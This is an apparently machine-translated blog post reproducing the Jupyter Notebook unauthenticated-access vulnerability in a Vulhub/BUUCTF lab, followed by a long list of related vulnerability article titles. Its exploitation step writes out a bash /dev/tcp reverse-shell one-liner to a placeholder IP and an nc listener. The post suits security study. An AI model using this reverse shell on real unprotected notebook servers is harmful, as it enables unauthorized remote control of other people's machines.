Jupyter Notebook unauthorized access vulnerability simply reproduces - Code World

Jupyter Notebook unauthorized access vulnerability simply reproduces

Others 2020-04-17 11:47:27 views: null

1 Introduction

Jupyter Notebook (previously called IPython notebook) is an interactive notebook that supports running more than 40 programming languages.
If the administrator does not configure a password for Jupyter Notebook, it will result in an unauthorized access vulnerability, where visitors can create a console and execute arbitrary Python code and commands.

2. Reproduce the environment

Sourced from https://github.com/vulhub/vulhub/blob/master/jupyter/notebook-rce/ map to facilitate direct reproduction with BUUCTF REAL environment

3. Use

Create a new terminal window, hehe hey, directly RCE

as shown below

4. I feel nothing to say

About the rebound shell

bash -i >& /dev/tcp/x.x.x.x/8080 0>&1

Then just listen on the other side

nc -lvp 8080（像这样）

Guess you like

Origin www.cnblogs.com/mke2fs/p/12718499.html

Jupyter Notebook unauthorized access vulnerability simply reproduces

Memcached Unauthorized Access Vulnerability

What is unauthorized access vulnerability

Logic Vulnerability Mining for Unauthorized Access

Redis unauthorized access vulnerability recurrence

Zookeeper unauthorized access vulnerability exploit

Access the server jupyter notebook

springboot unauthorized vulnerability (vulnerability reappears Springboot unauthorized access and repair)

redis Unauthorized Access Vulnerability reproduction study

JBOSS Unauthorized Access Vulnerability reproduction study

MongoDB Unauthorized Access Vulnerability reproduction study

ZooKeeper Unauthorized Access Vulnerability reproduction study

Redis unauthorized access to and use of the vulnerability protection

wen Security Vulnerability No. 4 - Unauthorized Access

Java security vulnerability: Druid unauthorized access solution

Hadoop-Unauthorized Access Vulnerability Reappearance

jupyter notebook Remote Access Configuration

An OA ajax.do unauthorized vulnerability uploads any file to getshell and reproduces it

fastcgi unauthorized access vulnerability (php-fpm fast-cgi unauthorized access vulnerability)

[Vulnerability Recurrence] JumpServer Unauthorized Access Vulnerability (CVE-2023-42442)

Linux system security reinforcement -ZooKeeper unauthorized access vulnerability handling

Redis Unauthorized Access Vulnerability Replay and rehabilitation program (unfinished)

Redis 4.x/5.x unauthorized access vulnerability

Web Security: Redis Unauthorized Access Vulnerability Test.

Nacos Unauthorized Access Vulnerability (CVE-2021-29441)

Apache APISIX Dashboard Unauthorized Access Vulnerability (CVE-2021-45232)

CVE-2023-23752 Joomla Unauthorized Access Vulnerability Analysis

Joomla has an unauthorized access vulnerability CVE-2023-23752

Wanhu collaborative office platform ezoffice has an unauthorized access vulnerability with a POC

[Principle Scan] Spring Boot Actuator Unauthorized Access Vulnerability

Recommended

Linus is the most active in "eating dog food"!

Ranking

Share good programmer web front-end array and sorting, de-duplication and random roll call

Compilation error caused by cv_bridge and python version problems error: return-statement with no value, in function returning'void*' [-fpe

魔众帮助中心系统 v3.1.0 首页切换器，界面优化

Die beim Millimeterwellenradar-Integrationstest aufgetretene Grube (Multiprozessbindung an einen UDP-Port verursacht Probleme)

How to suppress the "requires transitive directive for an automatic module" warning properly?

LeetCode-1743. Restore the Array From Adjacent Pairs-Analysis and Code (Java)

Summer 2019 Summer soft essay 7 workers

Python中Assert断言的使用语法和例子

LeetCode one question per day (2021-2-3 sliding window median)

Fairchild, the ancestor of semiconductors, the legend of the first trillion-dollar start-up

Daily

More

2024-05-20(5)

2024-05-19(0)

2024-05-18(31)

2024-05-17(6)

2024-05-16(23)

2024-05-15(5)

2024-05-14(9)

2024-05-13(8)

2024-05-12(28)

2024-05-11(32)